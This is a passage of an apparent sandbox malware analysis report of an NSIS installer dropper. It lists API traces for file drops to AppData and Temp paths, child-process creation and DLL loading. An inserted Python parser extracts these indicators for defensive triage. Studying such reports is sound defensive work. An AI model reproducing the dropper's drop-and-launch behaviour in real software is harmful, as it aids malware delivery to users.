                                  • GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                    • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                    • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                    • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                  • String ID:
                                  • API String ID: 2547128583-0
                                  • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                  • Instruction ID: ae0a47d2ae808e9ad23d4e83699500a4151a320e34d6f574464110b7e3b32053
                                  • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
                                  • Instruction Fuzzy Hash: 7AE08632A0951176D61097709D0496773ADDAC9740300087EF659F6181D738AC119E6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00405873
                                  • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: File$AttributesCreate
                                  • String ID:
                                  • API String ID: 415043291-0
                                  • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                  • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
                                  • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
                                  • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CloseHandle.KERNELBASE(FFFFFFFF), ref: 0040351C
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\, xrefs: 00403530
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID: C:\Users\user\AppData\Local\Temp\nsiB4B1.tmp\
                                  • API String ID: 2962429428-1796680068
                                  • Opcode ID: 69a1ec42bfd2c808f6210beb952dd846253a51cc7dcbdee1183c199696e0200a
                                  • Instruction ID: d56dd6d0e9358e7abe0e1c75cf4fb1a02b43fa7986872cd818a2a6dcef25a25f
                                  • Opcode Fuzzy Hash: 69a1ec42bfd2c808f6210beb952dd846253a51cc7dcbdee1183c199696e0200a
                                  • Instruction Fuzzy Hash: 07C0123090860466D2207F78AE0B7053B58A741336B900725F174B00F2D73C6A41556E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                                  • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405866
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                  • Instruction ID: 81e3be7da977fa0fdb855dbc2a497946ad1e8e9610c44c99cc48e92da118c7e0
                                  • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
                                  • Instruction Fuzzy Hash: C2C00271808501AAD6016B34EE0D81F7B66EB54321B148B25F469A01F0C7315C66DA2A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                  • GetLastError.KERNEL32 ref: 004053D7
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CreateDirectoryErrorLast
                                  • String ID:
                                  • API String ID: 1375471231-0
                                  • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                  • Instruction ID: 6b45de36f316d487aa01e9413b839baa5bb3cf32c01ac4838d60d751b980a7e6
                                  • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
                                  • Instruction Fuzzy Hash: E0C04C30619642DBD7105B31ED08B177E60EB50781F208935A506F11E0D6B4D451DD3E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

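The records above (CreateProcessA under "Error launching installer", GetSystemDirectoryA/wsprintfA before LoadLibraryExA, GetFileAttributesA on C:\Users\user\AppData\Roaming\word.exe followed by CreateFileA, the nsiB4B1.tmp working directory, CreateDirectoryA under %TEMP%) are the file-drop and child-process behaviour of the installer stub that this report's later stages build on. Reading them by hand across dozens of identical-looking blocks is slow, so the following is an added example, not Joe Sandbox code, of a small parser for the "APIs" trace lines in the format this page uses: it turns each line into API, module, argument list, call-site address and enclosing subcall, then pulls out the indicators a triage analyst wants (process creation, file and directory creation, DLL loads, dynamic symbol resolution, every Windows path passed as an argument). The category table and the "system directory load" check are the example's own heuristics; the sample trace is copied from the records above, and the LoadLibraryExA flag value 00000008 is LOAD_WITH_ALTERED_SEARCH_PATH.

```python
"""Parse Joe Sandbox 'APIs' trace lines and summarise dropper indicators.

Added example; not Joe Sandbox code.  The line format assumed is the one on
this page:

    • [Part of subcall function XXXXXXXX: ]Api.MODULE[(arg,arg,...)], ref: XXXXXXXX

SAMPLE_TRACE is copied from the API records above (NSIS stub at 0x400000).
"""
import re
from collections import defaultdict

_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*?)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
_WINPATH = re.compile(r"^[A-Za-z]:\\")

# Trace lines taken from the records above (constructed sample input).
SAMPLE_TRACE = """\
  • Part of subcall function 004053F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
  • Part of subcall function 004053F8: CloseHandle.KERNEL32(?), ref: 0040542A
• WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E72
• GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E82
• GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
• GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
  • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
  • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
  • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
• GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\\Users\\user\\AppData\\Roaming\\word.exe,80000000,00000003), ref: 00405873
• CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
• CloseHandle.KERNELBASE(FFFFFFFF), ref: 0040351C
• CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\\Users\\user\\AppData\\Local\\Temp\\,C:\\Users\\user\\AppData\\Local\\Temp\\,C:\\Users\\user\\AppData\\Local\\Temp\\,C:\\Users\\user\\AppData\\Local\\Temp\\,?,00403289), ref: 004053C9
• GetLastError.KERNEL32 ref: 004053D7
"""

# Which APIs matter for dropper triage (example's own grouping, not Joe Sandbox's).
_CATEGORIES = {
    "process_create": {"CreateProcessA", "CreateProcessW", "ShellExecuteA", "ShellExecuteW"},
    "file_write": {"CreateFileA", "CreateFileW", "WriteFile"},
    "dir_create": {"CreateDirectoryA", "CreateDirectoryW"},
    "dll_load": {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"},
    "dynamic_resolve": {"GetProcAddress"},
}


def parse_api_line(line):
    """Return {api, module, args, ref, subcall} for one trace line, else None."""
    m = _LINE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    return {
        "api": m["api"],
        "module": m["mod"],
        "args": args,
        "ref": m["ref"].upper(),
        "subcall": (m["sub"] or "").upper() or None,
    }


def parse_trace(text):
    """Parse every recognisable API line in a block of report text."""
    return [c for c in (parse_api_line(ln) for ln in text.splitlines()) if c]


def summarize(calls):
    """Call sites per category plus every Windows path seen in an argument."""
    out = {k: [] for k in _CATEGORIES}
    paths = []
    for c in calls:
        for cat, names in _CATEGORIES.items():
            if c["api"] in names:
                out[cat].append(c["ref"])
        for a in c["args"]:
            if _WINPATH.match(a) and a not in paths:
                paths.append(a)
    out["paths"] = paths
    # Files the stub touches under the user profile are the IOCs worth keeping.
    out["user_profile_paths"] = [p for p in paths if "\\AppData\\" in p]
    return out


def system_dir_loads(calls):
    """LoadLibraryEx* call sites whose enclosing subcall also queried the
    system directory, i.e. DLLs loaded by a full System32 path rather than by
    bare name (the GetSystemDirectoryA / wsprintfA / LoadLibraryExA triple)."""
    by_sub = defaultdict(list)
    for c in calls:
        if c["subcall"]:
            by_sub[c["subcall"]].append(c)
    hits = []
    for group in by_sub.values():
        if any(c["api"].startswith("GetSystemDirectory") for c in group):
            hits += [c["ref"] for c in group if c["api"].startswith("LoadLibraryEx")]
    return hits


if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    for key, value in summarize(calls).items():
        print(f"{key:20s} {value}")
    print("system-dir loads    ", system_dir_loads(calls))
```

Feed it the whole "APIs" section of a report rather than the excerpt: the summary then lists every call site that creates a file, directory or process, and the path list gives the drop location to hunt for on other hosts. Argument slots shown as `?` are values the sandbox could not resolve, so a CreateFileA with no path in its own arguments (as here) must be read together with the GetFileAttributesA that precedes it.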
                                  APIs
                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF), ref: 00403098
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                  • Instruction ID: e4cef5105026143dd13b930ce46becb45ea6c66ba88fb4286e933b642882ba15
                                  • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
                                  • Instruction Fuzzy Hash: F3E08631211118FBDF209E51EC00A973B9CDB04362F008032B904E5190D538DA10DBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000149E4), ref: 004030C1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: FilePointer
                                  • String ID:
                                  • API String ID: 973152223-0
                                  • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                  • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
                                  • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
                                  • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetDlgItem.USER32(?,00000403), ref: 00405021
                                  • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                  • GetClientRect.USER32 ref: 0040506D
                                  • GetSystemMetrics.USER32 ref: 00405075
                                  • SendMessageA.USER32 ref: 00405096
                                  • SendMessageA.USER32 ref: 004050A7
                                  • SendMessageA.USER32 ref: 004050BA
                                  • SendMessageA.USER32 ref: 004050C8
                                  • SendMessageA.USER32 ref: 004050DB
                                  • ShowWindow.USER32(00000000,?), ref: 004050FD
                                  • ShowWindow.USER32(?,00000008), ref: 00405111
                                  • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                  • SendMessageA.USER32 ref: 00405142
                                  • SendMessageA.USER32 ref: 0040515B
                                  • SendMessageA.USER32 ref: 00405167
                                  • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                    • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                                  • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                  • CloseHandle.KERNEL32(00000000), ref: 00405199
                                  • ShowWindow.USER32(00000000), ref: 004051BD
                                  • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                  • ShowWindow.USER32(00000008), ref: 00405209
                                  • SendMessageA.USER32 ref: 0040523B
                                  • CreatePopupMenu.USER32 ref: 0040524C
                                  • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                  • GetWindowRect.USER32(00000000,?), ref: 00405274
                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                  • SendMessageA.USER32 ref: 004052D3
                                  • OpenClipboard.USER32(00000000), ref: 004052E3
                                  • EmptyClipboard.USER32 ref: 004052E9
                                  • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                  • GlobalLock.KERNEL32 ref: 004052FC
                                  • SendMessageA.USER32 ref: 00405310
                                  • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                  • SetClipboardData.USER32 ref: 00405333
                                  • CloseClipboard.USER32 ref: 00405339
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                  • String ID: {
                                  • API String ID: 590372296-366298937
                                  • Opcode ID: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                  • Instruction ID: 6929f331228a41c4e1f6bf5049925f100d3ed94cd800429e98060a15954be78d
                                  • Opcode Fuzzy Hash: 2304b148e9a21fd8fd2dbd7aea04fbfc66f4e7d68f979f8d2529fbafd725d49b
                                  • Instruction Fuzzy Hash: 6DA13AB1900208BFDB119F60DD89AAE7F79FB44355F00813AFA05BA1A0C7795E41DFA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetDlgItem.USER32(?,000003F9), ref: 004047EA
                                  • GetDlgItem.USER32(?,00000408), ref: 004047F7
                                  • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404843
                                  • LoadBitmapA.USER32 ref: 00404856
                                  • SetWindowLongA.USER32(?,000000FC,00404DD4), ref: 00404870
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404884
                                  • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404898
                                  • SendMessageA.USER32 ref: 004048AD
                                  • SendMessageA.USER32 ref: 004048B9
                                  • SendMessageA.USER32 ref: 004048CB
                                  • DeleteObject.GDI32(?), ref: 004048D0
                                  • SendMessageA.USER32 ref: 004048FB
                                  • SendMessageA.USER32 ref: 00404907
                                  • SendMessageA.USER32 ref: 0040499C
                                  • SendMessageA.USER32 ref: 004049C7
                                  • SendMessageA.USER32 ref: 004049DB
                                  • GetWindowLongA.USER32(?,000000F0), ref: 00404A0A
                                  • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A18
                                  • ShowWindow.USER32(?,00000005), ref: 00404A29
                                  • SendMessageA.USER32 ref: 00404B2C
                                  • SendMessageA.USER32 ref: 00404B91
                                  • SendMessageA.USER32 ref: 00404BA6
                                  • SendMessageA.USER32 ref: 00404BCA
                                  • SendMessageA.USER32 ref: 00404BF0
                                  • ImageList_Destroy.COMCTL32(?), ref: 00404C05
                                  • GlobalFree.KERNEL32(?), ref: 00404C15
                                  • SendMessageA.USER32 ref: 00404C85
                                  • SendMessageA.USER32 ref: 00404D2E
                                  • SendMessageA.USER32 ref: 00404D3D
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D5D
                                  • ShowWindow.USER32(?,00000000), ref: 00404DAB
                                  • GetDlgItem.USER32(?,000003FE), ref: 00404DB6
                                  • ShowWindow.USER32(00000000), ref: 00404DBD
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                  • String ID: $M$N
                                  • API String ID: 1638840714-813528018
                                  • Opcode ID: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                  • Instruction ID: 9a6d62add78faf2b4aa272e1cf177665df16ecedb9a61d3aa4425c18576eb247
                                  • Opcode Fuzzy Hash: dd6819aa1443f5cf7d51c2c88bee5c86e1a698ab9de6fee51b1062b3689a5351
                                  • Instruction Fuzzy Hash: 8B029DB0E00209AFDB24DF55DD45AAE7BB5EB84315F10817AF610BA2E1C7789A81CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetDlgItem.USER32(?,000003FB), ref: 004042E1
                                  • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                  • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                  • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                  • lstrcmpiA.KERNEL32("C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ,00420538,00000000,?,?), ref: 004043F9
                                  • lstrcatA.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" ), ref: 00404405
                                  • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404417
                                    • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                    • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E52
                                    • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E5F
                                    • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E64
                                    • Part of subcall function 00405DFA: CharPrevA.USER32(?,?), ref: 00405E74
                                  • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                  • MulDiv.KERNEL32 ref: 004044F0
                                    • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                    • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                    • Part of subcall function 00404649: SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415641916.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                  Similarity
                                  • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" $A$C:\Users\user\AppData\Local\Temp
                                  • API String ID: 2624150263-1141227420
                                  • Opcode ID: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                  • Instruction ID: cfccd4b73e861dd9bc9b7885d3f414f2f86db1ffcc16c92a650f1104495a78a5
                                  • Opcode Fuzzy Hash: fb58f5be01c1fbab376fe3aca88381438e011d3cf0c95fbb8aa79c4ccef87f62
                                  • Instruction Fuzzy Hash: EAA17EB1D00218BBDB11AFA5CD41AAFB6B8EF84315F10813BF605B62D1D77C9A418F69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?), ref: 004020A6
                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.415620868.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000005.00000002.415617748.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415624203.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                  • Associated: 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp
